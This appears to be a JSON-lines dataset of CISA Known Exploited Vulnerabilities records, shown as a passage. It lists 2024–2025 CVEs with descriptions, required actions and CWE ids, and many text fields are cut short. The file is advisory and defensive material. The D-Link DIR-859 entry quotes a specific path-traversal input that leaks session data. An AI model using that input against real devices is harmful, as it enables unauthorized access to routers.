Secure Firewall Threat Defense (FTD) Buffer Overflow Vulnerability\n\nAffected: Cisco Secure Firewall Adaptive Security Appliance and Secure Firewall Threat Defense\n\nCisco Secure Firewall Adaptive Security (ASA) Appliance and Secure Firewall Threat Defense (FTD) Software VPN Web Server contain a buffer overflow vulnerability that allows for remote code execution. This vulnerability could be chained with CVE-2025-20362.\n\nRequired Action: T", "cve_id": "CVE-2025-20333", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-10585", "text": "Google Chromium V8 Type Confusion Vulnerability\n\nAffected: Google Chromium V8\n\nGoogle Chromium contains a type confusion vulnerability in the V8 JavaScript and WebAssembly engine.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-843\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2025-10585", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-5086", "text": "Dassault Systèmes DELMIA Apriso Deserialization of Untrusted Data Vulnerability\n\nAffected: Dassault Systèmes DELMIA Apriso\n\nDassault Systèmes DELMIA Apriso contains a deserialization of untrusted data vulnerability that could lead to a remote code execution.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-502\n\n[Source: CISA Known Exploited Vulnerabi", "cve_id": "CVE-2025-5086", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-38352", "text": "Linux Kernel Time-of-Check Time-of-Use (TOCTOU) Race Condition Vulnerability\n\nAffected: Linux Kernel\n\nLinux kernel contains a time-of-check time-of-use (TOCTOU) race condition vulnerability that has a high impact on confidentiality, integrity, and availability.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-367\n\n[Source: CISA Known Exploited Vulner", "cve_id": "CVE-2025-38352", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-48543", "text": "Android Runtime Use-After-Free Vulnerability\n\nAffected: Android Runtime\n\nAndroid Runtime contains a use-after-free vulnerability potentially allowing a chrome sandbox escape leading to local privilege escalation.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2025-48543", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-53690", "text": "Sitecore Multiple Products Deserialization of Untrusted Data Vulnerability\n\nAffected: Sitecore Multiple Products\n\nSitecore Experience Manager (XM), Experience Platform (XP), Experience Commerce (XC), and Managed Cloud contain a deserialization of untrusted data vulnerability involving the use of default machine keys. This flaw allows attackers to exploit exposed ASP.NET machine keys to achieve remote code execution. \n\nRequired Action: Apply mitigations per vendor instructions, follow applicable ", "cve_id": "CVE-2025-53690", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-9377", "text": "TP-Link Archer C7(EU) and TL-WR841N/ND(MS) OS Command Injection Vulnerability\n\nAffected: TP-Link Multiple Routers\n\nTP-Link Archer C7(EU) and TL-WR841N/ND(MS) contain an OS command injection vulnerability that exists in the Parental Control page. The impacted products could be end-of-life (EoL) and/or end-of-service (EoS). Users should discontinue product utilization.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontin", "cve_id": "CVE-2025-9377", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-55177", "text": "Meta Platforms WhatsApp Incorrect Authorization Vulnerability\n\nAffected: Meta Platforms WhatsApp\n\nMeta Platforms WhatsApp contains an incorrect authorization vulnerability due to an incomplete authorization of linked device synchronization messages. This vulnerability could allow an unrelated user to trigger processing of content from an arbitrary URL on a target’s device.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or dis", "cve_id": "CVE-2025-55177", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-57819", "text": "Sangoma FreePBX Authentication Bypass Vulnerability\n\nAffected: Sangoma FreePBX\n\nSangoma FreePBX contains an authentication bypass vulnerability due to insufficiently sanitized user-supplied data allows unauthenticated access to FreePBX Administrator leading to arbitrary database manipulation and remote code execution.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailab", "cve_id": "CVE-2025-57819", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-7775", "text": "Citrix NetScaler Memory Overflow Vulnerability\n\nAffected: Citrix NetScaler\n\nCitrix NetScaler ADC and NetScaler Gateway contain a memory overflow vulnerability that could allow for remote code execution and/or denial of service.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-119\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2025-7775", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-48384", "text": "Git Link Following Vulnerability\n\nAffected: Git Git\n\nGit contains a link following vulnerability that stems from Git’s inconsistent handling of carriage return characters in configuration files.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-59, CWE-436\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2025-48384", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-8068", "text": "Citrix Session Recording Improper Privilege Management Vulnerability\n\nAffected: Citrix Session Recording\n\nCitrix Session Recording contains an improper privilege management vulnerability that could allow for privilege escalation to NetworkService Account access. An attacker must be an authenticated user in the same Windows Active Directory domain as the session recording server domain.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud ser", "cve_id": "CVE-2024-8068", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-8069", "text": "Citrix Session Recording Deserialization of Untrusted Data Vulnerability\n\nAffected: Citrix Session Recording\n\nCitrix Session Recording contains a deserialization of untrusted data vulnerability that allows limited remote code execution with privilege of a NetworkService Account access. Attacker must be an authenticated user on the same intranet as the session recording server.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or", "cve_id": "CVE-2024-8069", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-43300", "text": "Apple iOS, iPadOS, and macOS Out-of-Bounds Write Vulnerability\n\nAffected: Apple iOS, iPadOS, and macOS\n\nApple iOS, iPadOS, and macOS contain an out-of-bounds write vulnerability in the Image I/O framework.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-787\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2025-43300", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-54948", "text": "Trend Micro Apex One OS Command Injection Vulnerability\n\nAffected: Trend Micro Apex One\n\nTrend Micro Apex One Management Console (on-premise) contains an OS command injection vulnerability that could allow a pre-authenticated remote attacker to upload malicious code and execute commands on affected installations.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\n", "cve_id": "CVE-2025-54948", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-8876", "text": "N-able N-Central Command Injection Vulnerability\n\nAffected: N-able N-Central\n\nN-able N-Central contains a command injection vulnerability via improper sanitization of user input.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2025-8876", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-8875", "text": "N-able N-Central Insecure Deserialization Vulnerability\n\nAffected: N-able N-Central\n\nN-able N-Central contains an insecure deserialization vulnerability that could lead to command execution.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2025-8875", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-8088", "text": "RARLAB WinRAR Path Traversal Vulnerability\n\nAffected: RARLAB WinRAR\n\nRARLAB WinRAR contains a path traversal vulnerability affecting the Windows version of WinRAR. This vulnerability could allow an attacker to execute arbitrary code by crafting malicious archive files.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-35\n\n[Source: CISA Known Exploited", "cve_id": "CVE-2025-8088", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-20337", "text": "Cisco Identity Services Engine Injection Vulnerability\n\nAffected: Cisco Identity Services Engine\n\nCisco Identity Services Engine contains an injection vulnerability in a specific API of Cisco ISE and Cisco ISE-PIC due to insufficient validation of user-supplied input allowing an attacker to exploit this vulnerability by submitting a crafted API request. Successful exploitation could allow an attacker to perform remote code execution and obtaining root privileges on an affected device.\n\nRequired ", "cve_id": "CVE-2025-20337", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-2775", "text": "SysAid On-Prem Improper Restriction of XML External Entity Reference Vulnerability\n\nAffected: SysAid SysAid On-Prem\n\nSysAid On-Prem contains an improper restriction of XML external entity reference vulnerability in the Checkin processing functionality, allowing for administrator account takeover and file read primitives.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavai", "cve_id": "CVE-2025-2775", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-2776", "text": "SysAid On-Prem Improper Restriction of XML External Entity Reference Vulnerability\n\nAffected: SysAid SysAid On-Prem\n\nSysAid On-Prem contains an improper restriction of XML external entity reference vulnerability in the Server URL processing functionality, allowing for administrator account takeover and file read primitives.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are una", "cve_id": "CVE-2025-2776", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-6558", "text": "Google Chromium ANGLE and GPU Improper Input Validation Vulnerability\n\nAffected: Google Chromium\n\nGoogle Chromium contains an improper input validation vulnerability in ANGLE and GPU. This vulnerability could allow a remote attacker to potentially perform a sandbox escape via a crafted HTML page. This vulnerability could affect multiple web browsers that utilize Chromium, including, but not limited to, Google Chrome, Microsoft Edge, and Opera.\n\nRequired Action: Apply mitigations per vendor instr", "cve_id": "CVE-2025-6558", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-54309", "text": " CrushFTP Unprotected Alternate Channel Vulnerability\n\nAffected: CrushFTP CrushFTP\n\nCrushFTP contains an unprotected alternate channel vulnerability. When the DMZ proxy feature is not used, mishandles AS2 validation and consequently allows remote attackers to obtain admin access via HTTPS.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-420\n\n[Source", "cve_id": "CVE-2025-54309", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-49704", "text": "Microsoft SharePoint Code Injection Vulnerability\n\nAffected: Microsoft SharePoint\n\nMicrosoft SharePoint contains a code injection vulnerability that could allow an authorized attacker to execute code over a network. This vulnerability could be chained with CVE-2025-49706. CVE-2025-53770 is a patch bypass for CVE-2025-49704, and the updates for CVE-2025-53770 include more robust protection than those for CVE-2025-49704.\n\nRequired Action: Disconnect public-facing versions of SharePoint Server that", "cve_id": "CVE-2025-49704", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-49706", "text": "Microsoft SharePoint Improper Authentication Vulnerability\n\nAffected: Microsoft SharePoint\n\nMicrosoft SharePoint contains an improper authentication vulnerability that allows an authorized attacker to perform spoofing over a network. Successfully exploitation could allow an attacker to view sensitive information and make some changes to disclosed information. This vulnerability could be chained with CVE-2025-49704. CVE-2025-53771 is a patch bypass for CVE-2025-49706, and the updates for CVE-2025", "cve_id": "CVE-2025-49706", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-53770", "text": "Microsoft SharePoint Deserialization of Untrusted Data Vulnerability\n\nAffected: Microsoft SharePoint\n\nMicrosoft SharePoint Server on-premises contains a deserialization of untrusted data vulnerability that could allow an unauthorized attacker to execute code over a network. This vulnerability could be chained with CVE-2025-53771. CVE-2025-53770 is a patch bypass for CVE-2025-49704, and the updates for CVE-2025-53770 include more robust protection than those for CVE-2025-49704.\n\nRequired Action: ", "cve_id": "CVE-2025-53770", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-25257", "text": "Fortinet FortiWeb SQL Injection Vulnerability\n\nAffected: Fortinet FortiWeb\n\nFortinet FortiWeb contains a SQL injection vulnerability that may allow an unauthenticated attacker to execute unauthorized SQL code or commands via crafted HTTP or HTTPs requests.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-89\n\n[Source: CISA Known Exploited Vulnerabilit", "cve_id": "CVE-2025-25257", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-47812", "text": "Wing FTP Server Improper Neutralization of Null Byte or NUL Character Vulnerability\n\nAffected: Wing FTP Server Wing FTP Server\n\nWing FTP Server contains an improper neutralization of null byte or NUL character vulnerability that can allow injection of arbitrary Lua code into user session files. This can be used to execute arbitrary system commands with the privileges of the FTP service (root or SYSTEM by default).\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD", "cve_id": "CVE-2025-47812", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-5777", "text": "Citrix NetScaler ADC and Gateway Out-of-Bounds Read Vulnerability\n\nAffected: Citrix NetScaler ADC and Gateway\n\nCitrix NetScaler ADC and Gateway contain an out-of-bounds read vulnerability due to insufficient input validation. This vulnerability can lead to memory overread when the NetScaler is configured as a Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) OR AAA virtual server.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud s", "cve_id": "CVE-2025-5777", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-6554", "text": "Google Chromium V8 Type Confusion Vulnerability\n\nAffected: Google Chromium V8\n\nGoogle Chromium V8 contains a type confusion vulnerability that could allow a remote attacker to perform arbitrary read/write via a crafted HTML page. This vulnerability could affect multiple web browsers that utilize Chromium, including, but not limited to, Google Chrome, Microsoft Edge, and Opera.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or", "cve_id": "CVE-2025-6554", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-48928", "text": "TeleMessage TM SGNL Exposure of Core Dump File to an Unauthorized Control Sphere Vulnerability\n\nAffected: TeleMessage TM SGNL\n\nTeleMessage TM SGNL contains an exposure of core dump file to an unauthorized control sphere Vulnerability. This vulnerability is based on a JSP application in which the heap content is roughly equivalent to a \"core dump\" in which a password previously sent over HTTP would be included in this dump.\n\nRequired Action: Apply mitigations per vendor instructions, follow appli", "cve_id": "CVE-2025-48928", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-48927", "text": "TeleMessage TM SGNL Initialization of a Resource with an Insecure Default Vulnerability\n\nAffected: TeleMessage TM SGNL\n\nTeleMessage TM SGNL contains an initialization of a resource with an insecure default vulnerability. This vulnerability relies on how the Spring Boot Actuator is configured with an exposed heap dump endpoint at a /heapdump URI.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product ", "cve_id": "CVE-2025-48927", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-6543", "text": "Citrix NetScaler ADC and Gateway Buffer Overflow Vulnerability\n\nAffected: Citrix NetScaler ADC and Gateway\n\nCitrix NetScaler ADC and Gateway contain a buffer overflow vulnerability leading to unintended control flow and Denial of Service. NetScaler must be configured as Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) OR AAA virtual server.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the produ", "cve_id": "CVE-2025-6543", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-0769", "text": " D-Link DIR-859 Router Path Traversal Vulnerability\n\nAffected: D-Link DIR-859 Router\n\nD-Link DIR-859 routers contain a path traversal vulnerability in the file /hedwig.cgi of the component HTTP POST Request Handler. Manipulation of the argument service with the input ../../../../htdocs/webinc/getcfg/DHCPS6.BRIDGE-1.xml allows for the leakage of session data potentially enabling privilege escalation and unauthorized control of the device. This vulnerability affects legacy D-Link products. All ass", "cve_id": "CVE-2024-0769", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-54085", "text": "AMI MegaRAC SPx Authentication Bypass by Spoofing Vulnerability\n\nAffected: AMI MegaRAC SPx\n\nAMI MegaRAC SPx contains an authentication bypass by spoofing vulnerability in the Redfish Host Interface. A successful exploitation of this vulnerability may lead to a loss of confidentiality, integrity, and/or availability.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable", "cve_id": "CVE-2024-54085", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-43200", "text": "Apple Multiple Products Unspecified Vulnerability\n\nAffected: Apple Multiple Products\n\nApple iOS, iPadOS, macOS, watchOS, and visionOS, contain an unspecified vulnerability when processing a maliciously crafted photo or video shared via an iCloud Link.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2025-43200", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-33053", "text": " Microsoft Windows External Control of File Name or Path Vulnerability\n\nAffected: Microsoft Windows\n\nMicrosoft Windows contains an external control of file name or path vulnerability that could allow an attacker to execute code from a remote WebDAV location specified by the WorkingDirectory attribute of Internet Shortcut files.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are", "cve_id": "CVE-2025-33053", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-24016", "text": "Wazuh Server Deserialization of Untrusted Data Vulnerability\n\nAffected: Wazuh Wazuh Server\n\nWazuh contains a deserialization of untrusted data vulnerability that allows for remote code execution on Wazuh servers.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-502\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2025-24016", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-42009", "text": "RoundCube Webmail Cross-Site Scripting Vulnerability\n\nAffected: Roundcube Webmail\n\nRoundCube Webmail contains a cross-site scripting vulnerability. This vulnerability could allow a remote attacker to steal and send emails of a victim via a crafted e-mail message that abuses a Desanitization issue in message_body() in program/actions/mail/show.php.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the produc", "cve_id": "CVE-2024-42009", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-32433", "text": "Erlang Erlang/OTP SSH Server Missing Authentication for Critical Function Vulnerability\n\nAffected: Erlang Erlang/OTP\n\nErlang Erlang/OTP SSH server contains a missing authentication for critical function vulnerability. This could allow an attacker to execute arbitrary commands without valid credentials, potentially leading to unauthenticated remote code execution (RCE). By exploiting a flaw in how SSH protocol messages are handled, a malicious actor could gain unauthorized access to affected syst", "cve_id": "CVE-2025-32433", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-5419", "text": "Google Chromium V8 Out-of-Bounds Read and Write Vulnerability\n\nAffected: Google Chromium V8\n\nGoogle Chromium V8 contains an out-of-bounds read and write vulnerability that could allow a remote attacker to potentially exploit heap corruption via a crafted HTML page. This vulnerability could affect multiple web browsers that utilize Chromium, including, but not limited to, Google Chrome, Microsoft Edge, and Opera.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 2", "cve_id": "CVE-2025-5419", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-21479", "text": "Qualcomm Multiple Chipsets Incorrect Authorization Vulnerability\n\nAffected: Qualcomm Multiple Chipsets\n\nMultiple Qualcomm chipsets contain an incorrect authorization vulnerability. This vulnerability allows for memory corruption due to unauthorized command execution in GPU micronode while executing specific sequence of commands.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations ar", "cve_id": "CVE-2025-21479", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-27038", "text": "Qualcomm Multiple Chipsets Use-After-Free Vulnerability\n\nAffected: Qualcomm Multiple Chipsets\n\nMultiple Qualcomm chipsets contain a use-after-free vulnerability. This vulnerability allows for memory corruption while rendering graphics using Adreno GPU drivers in Chrome.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-416\n\n[Source: CISA Known Exploit", "cve_id": "CVE-2025-27038", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-3935", "text": "ConnectWise ScreenConnect Improper Authentication Vulnerability\n\nAffected: ConnectWise ScreenConnect\n\nConnectWise ScreenConnect contains an improper authentication vulnerability. This vulnerability could allow a ViewState code injection attack, which could allow remote code execution if machine keys are compromised.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable", "cve_id": "CVE-2025-3935", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-35939", "text": "Craft CMS External Control of Assumed-Immutable Web Parameter Vulnerability\n\nAffected: Craft CMS Craft CMS\n\nCraft CMS contains an external control of assumed-immutable web parameter vulnerability. This vulnerability could allow an unauthenticated client to introduce arbitrary values, such as PHP code, to a known local file location on the server. This vulnerability could be chained with CVE-2024-58136 as represented by CVE-2025-32432.\n\nRequired Action: Apply mitigations per vendor instructions, ", "cve_id": "CVE-2025-35939", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-56145", "text": "Craft CMS Code Injection Vulnerability\n\nAffected: Craft CMS Craft CMS\n\nCraft CMS contains a code injection vulnerability. Users with affected versions are vulnerable to remote code execution if their php.ini configuration has `register_argc_argv` enabled.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-94\n\n[Source: CISA Known Exploited Vulnerabiliti", "cve_id": "CVE-2024-56145", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-4632", "text": "Samsung MagicINFO 9 Server Path Traversal Vulnerability\n\nAffected: Samsung MagicINFO 9 Server\n\nSamsung MagicINFO 9 Server contains a path traversal vulnerability that allows an attacker to write arbitrary file as system authority.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-22\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2025-4632", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-27443", "text": "Synacor Zimbra Collaboration Suite (ZCS) Cross-Site Scripting (XSS) Vulnerability\n\nAffected: Synacor Zimbra Collaboration Suite (ZCS)\n\nZimbra Collaboration contains a cross-site scripting (XSS) vulnerability in the CalendarInvite feature of the Zimbra webmail classic user interface. An attacker can exploit this vulnerability via an email message containing a crafted calendar header, leading to the execution of arbitrary JavaScript code.\n\nRequired Action: Apply mitigations per vendor instructions", "cve_id": "CVE-2024-27443", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-27920", "text": "Srimax Output Messenger Directory Traversal Vulnerability\n\nAffected: Srimax Output Messenger\n\nSrimax Output Messenger contains a directory traversal vulnerability that allows an attacker to access sensitive files outside the intended directory, potentially leading to configuration leakage or arbitrary file access.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n", "cve_id": "CVE-2025-27920", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-11182", "text": "MDaemon Email Server Cross-Site Scripting (XSS) Vulnerability\n\nAffected: MDaemon Email Server\n\nMDaemon Email Server contains a cross-site scripting (XSS) vulnerability that allows a remote attacker to load arbitrary JavaScript code via an HTML e-mail message.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-79\n\n[Source: CISA Known Exploited Vulnerabi", "cve_id": "CVE-2024-11182", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-4428", "text": "Ivanti Endpoint Manager Mobile (EPMM) Code Injection Vulnerability\n\nAffected: Ivanti Endpoint Manager Mobile (EPMM)\n\nIvanti Endpoint Manager Mobile (EPMM) contains a code injection vulnerability in the API component that allows an authenticated attacker to remotely execute arbitrary code via crafted API requests. This vulnerability results from an insecure implementation of the Hibernate Validator open-source library, as represented by CVE-2025-35036.\n\nRequired Action: Apply mitigations per vend", "cve_id": "CVE-2025-4428", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-4427", "text": "Ivanti Endpoint Manager Mobile (EPMM) Authentication Bypass Vulnerability\n\nAffected: Ivanti Endpoint Manager Mobile (EPMM)\n\nIvanti Endpoint Manager Mobile (EPMM) contains an authentication bypass vulnerability in the API component that allows an attacker to access protected resources without proper credentials via crafted API requests. This vulnerability results from an insecure implementation of the Spring Framework open-source library.\n\nRequired Action: Apply mitigations per vendor instruction", "cve_id": "CVE-2025-4427", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-42999", "text": "SAP NetWeaver Deserialization Vulnerability\n\nAffected: SAP NetWeaver\n\nSAP NetWeaver Visual Composer Metadata Uploader contains a deserialization vulnerability that allows a privileged attacker to compromise the confidentiality, integrity, and availability of the host system by deserializing untrusted or malicious content.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unava", "cve_id": "CVE-2025-42999", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-12987", "text": "DrayTek Vigor Routers OS Command Injection Vulnerability\n\nAffected: DrayTek Vigor Routers\n\nDrayTek Vigor2960, Vigor300B, and Vigor3900 routers contain an OS command injection vulnerability due to an unknown function of the file /cgi-bin/mainfunction.cgi/apmcfgupload of the component web management interface.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s", "cve_id": "CVE-2024-12987", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-32756", "text": "Fortinet Multiple Products Stack-Based Buffer Overflow Vulnerability\n\nAffected: Fortinet Multiple Products\n\nFortinet FortiFone, FortiVoice, FortiNDR and FortiMail contain a stack-based overflow vulnerability that may allow a remote unauthenticated attacker to execute arbitrary code or commands via crafted HTTP requests.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavail", "cve_id": "CVE-2025-32756", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-32709", "text": "Microsoft Windows Ancillary Function Driver for WinSock Use-After-Free Vulnerability\n\nAffected: Microsoft Windows\n\nMicrosoft Windows Ancillary Function Driver for WinSock contains a use-after-free vulnerability that allows an authorized attacker to escalate privileges to administrator.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-416\n\n[Source: CI", "cve_id": "CVE-2025-32709", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-30397", "text": "Microsoft Windows Scripting Engine Type Confusion Vulnerability\n\nAffected: Microsoft Windows\n\nMicrosoft Windows Scripting Engine contains a type confusion vulnerability that allows an unauthorized attacker to execute code over a network via a specially crafted URL.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-843\n\n[Source: CISA Known Exploited Vu", "cve_id": "CVE-2025-30397", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-32706", "text": "Microsoft Windows Common Log File System (CLFS) Driver Heap-Based Buffer Overflow Vulnerability\n\nAffected: Microsoft Windows\n\nMicrosoft Windows Common Log File System (CLFS) Driver contains a heap-based buffer overflow vulnerability that allows an authorized attacker to elevate privileges locally.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-122\n", "cve_id": "CVE-2025-32706", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-32701", "text": "Microsoft Windows Common Log File System (CLFS) Driver Use-After-Free Vulnerability\n\nAffected: Microsoft Windows\n\nMicrosoft Windows Common Log File System (CLFS) Driver contains a use-after-free vulnerability that allows an authorized attacker to elevate privileges locally.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-416\n\n[Source: CISA Known Exp", "cve_id": "CVE-2025-32701", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-30400", 